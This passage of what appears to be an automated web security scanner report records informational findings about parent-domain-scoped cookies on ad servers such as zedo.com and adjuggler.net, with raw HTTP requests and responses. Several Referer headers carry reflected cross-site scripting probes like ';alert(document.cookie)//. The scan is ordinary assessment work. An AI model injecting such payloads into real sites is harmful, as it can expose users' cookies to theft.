Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle&page=bh.heraldinteractive.com/blogs/news/lone_republican
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883604Zc826000187,826000187Zs173Zt128; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1

Response

10.50. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FFgeo=5386156;expires=Sat, 28 Jan 2012 16:41:44 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-401/d3/jsc/gl.js HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0:0; FFcat=1220,167,14:1220,101,9
If-None-Match: "812b9ff1-5d7-4989a5a58d7c0"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Sat, 28 Jan 2012 16:41:44 GMT;domain=.zedo.com;path=/;
ETag: "81ee0db6-5d7-4989a5a58d7c0"
Vary: Accept-Encoding
X-Varnish: 2233581894 2233581891
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=370269
Expires: Tue, 01 Feb 2011 23:32:53 GMT
Date: Fri, 28 Jan 2011 16:41:44 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var zzl='en-US';

if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

10.51. http://d7.zedo.com/img/bh.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/img/bh.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ZFFAbh=749B826,20|1483_759#365;expires=Sat, 28 Jan 2012 21:57:38 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=1483&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/ADO/iview/278612752/direct;wi.1;hi.1/01?click=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; aps=2; FFpb=1220:4f791'$951:ibnetwork300x250; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116#653213|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,27,2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1
If-None-Match: "6ae02bae-7054-4942082502f40"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=749B826,20|1483_759#365;expires=Sat, 28 Jan 2012 21:57:38 GMT;domain=.zedo.com;path=/;
ETag: "199804b-7054-4942082502f40"
X-Varnish: 1435724280 1435712339
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30441
Expires: Sat, 29 Jan 2011 06:24:59 GMT
Date: Fri, 28 Jan 2011 21:57:38 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

10.52. http://d7.zedo.com/utils/ecSet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PI=h1037004Za883605Zc826000187,826000187Zs173Zt128;expires=Mon, 28 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ecSet.js?v=PI=h1037004Za883605Zc826000187%2C826000187Zs173Zt128&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:38,26,1:24,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,7,14:826,187,9:951,7,9:951,2,9:951,11,14:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=35:15:52:27:24:16:2:1:1:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:14,26,1:14,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: PI=h1037004Za883605Zc826000187,826000187Zs173Zt128;expires=Mon, 28 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
X-Varnish: 2807523739
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=3419
Date: Sat, 29 Jan 2011 02:23:29 GMT
Connection: close

10.53. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

c=201003Jhk3Ji23Jhj0000-N81mUzJ_0VX17742830124_358090_2FX10137980545300003K99;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:03 GMT;Path=/servlet/ajrotator/track/pt63693

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Location: http://
Server: JBird/1.0b
Date: Fri, 28 Jan 2011 16:46:03 GMT
Connection: close
Set-Cookie: c=201003Jhk3Ji23Jhj0000-N81mUzJ_0VX17742830124_358090_2FX10137980545300003K99;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:03 GMT;Path=/servlet/ajrotator/track/pt63693

10.54. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63722/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=201013Jhk3Ji23Jhj0000-N81mUzJ_0VX17740399776_948869_2FX101379805453000036Iu;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:14:35 GMT;Path=/servlet/ajrotator/track/pt63693

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63722/0/vj?ajecscp=1296224075221&z=hpi&dim=63352&pos=1&pv=1866403664462269&nc=5322587 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 14:14:34 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Content-Type: application/x-javascript
Set-Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/
Set-Cookie: i=201013Jhk3Ji23Jhj0000-N81mUzJ_0VX17740399776_948869_2FX101379805453000036Iu;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:14:35 GMT;Path=/servlet/ajrotator/track/pt63693
Set-Cookie: ajcmp=20236X6003Csd;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/

document.write("<"+"script language=\"JavaScript\">\n");
document.write("var zflag_nid=\"1220\"; var zflag_cid=\"101\"; var zflag_sid=\"69\"; var zflag_width=\"300\"; var zflag_height=\"250\"; var zfl
...[SNIP]...

10.55. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

c=201003Ptn3Ji53Por0000-N81mUzJ_0VX17742515437_149163_2FX101379805453000035Ds;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:05 GMT;Path=/servlet/ajrotator/track/pt63693

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Location: http://
Server: JBird/1.0b
Date: Fri, 28 Jan 2011 16:46:05 GMT
Connection: close
Set-Cookie: c=201003Ptn3Ji53Por0000-N81mUzJ_0VX17742515437_149163_2FX101379805453000035Ds;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:05 GMT;Path=/servlet/ajrotator/track/pt63693

10.56. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63723/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:48:32 GMT;Path=/servlet/ajrotator/track/pt63693

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63723/0/vj?z=hpi&dim=63359&pos=1&pv=972835293505342&nc=23918955 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X6003Csd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 14:48:31 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Content-Type: application/x-javascript
Set-Cookie: i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:48:32 GMT;Path=/servlet/ajrotator/track/pt63693
Set-Cookie: ajcmp=20236X631Sh003KAA;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:48:32 GMT;Path=/

document.write("<"+"script language=\"JavaScript\">\n");
document.write("var zflag_nid=\"1220\"; var zflag_cid=\"167\"; var zflag_sid=\"126\"; var zflag_width=\"728\"; var zflag_height=\"90\"; var zfl
...[SNIP]...

10.57. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

c=201003Ji03JiF3JhX0000-N81mUzJ_0VX17743400865_266261_2FX10137980545300003FMt;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 17:26:43 GMT;Path=/servlet/ajrotator/track/pt63689

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X00631Sh00PZ; optin=Aa; i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Location: http://
Server: JBird/1.0b
Date: Fri, 28 Jan 2011 17:26:43 GMT
Connection: close
Set-Cookie: c=201003Ji03JiF3JhX0000-N81mUzJ_0VX17743400865_266261_2FX10137980545300003FMt;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 17:26:43 GMT;Path=/servlet/ajrotator/track/pt63689

10.58. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/63733/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 16:41:44 GMT;Path=/servlet/ajrotator/track/pt63689

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63733/0/vj?z=hpi&dim=63352&pos=1&pv=7891522417776288&nc=72556237 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X631Sh003KAA

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:41:43 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Content-Type: application/x-javascript
Set-Cookie: i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 16:41:44 GMT;Path=/servlet/ajrotator/track/pt63689
Set-Cookie: ajcmp=20236X00631Sh00PZ;Max-Age=63072000;expires=Sun, 27 Jan 2013 16:41:44 GMT;Path=/

document.write("<"+"!--Iframe Tag -->\n");
document.write("<"+"!-- begin ZEDO for channel: HLW on MB - CPM , publisher: MB Network , Ad Dimension: Medium Rectangle - 300 x 250 -->\n");
document.write
...[SNIP]...

10.59. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly
uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA.&tt_code=nydailynews.com&udj=uf%28%27a%27%2C+537%2C+1296224069%29%3Buf%28%27c%27%2C+5740%2C+1296224069%29%3Buf%28%27r%27%2C+157830%2C+1296224069%29%3Bppv%28783%2C+%273218538236873087490%27%2C+1296224069%2C+1297520069%2C+5740%2C+25733%29%3B&cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI.&referrer=http://www.nydailynews.com/blogs70f75 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
